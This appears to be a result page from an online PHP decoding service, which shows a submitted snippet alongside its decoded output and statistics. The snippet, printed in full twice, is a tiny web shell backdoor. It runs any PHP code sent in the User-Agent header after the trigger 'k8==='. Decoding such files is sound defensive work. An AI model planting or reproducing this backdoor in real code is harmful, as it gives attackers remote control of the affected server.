Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? $ua=@$_SERVER["HTTP_USER_AGENT"];$row=split("===",$ua);echo "->|";if($row[0]=="k8")@eva..
Decoded Output download
<? $ua=@$_SERVER["HTTP_USER_AGENT"];$row=split("===",$ua);echo "->|";if($row[0]=="k8")@eval($row[1]);echo "|<-";?>
Did this file decode correctly?
Original Code
<? $ua=@$_SERVER["HTTP_USER_AGENT"];$row=split("===",$ua);echo "->|";if($row[0]=="k8")@eval($row[1]);echo "|<-";?>
Function Calls
| split | 1 |
Stats
| MD5 | 4c7c8ed723c760c5221a72b172c5123c |
| Eval Count | 0 |
| Decode Time | 104 ms |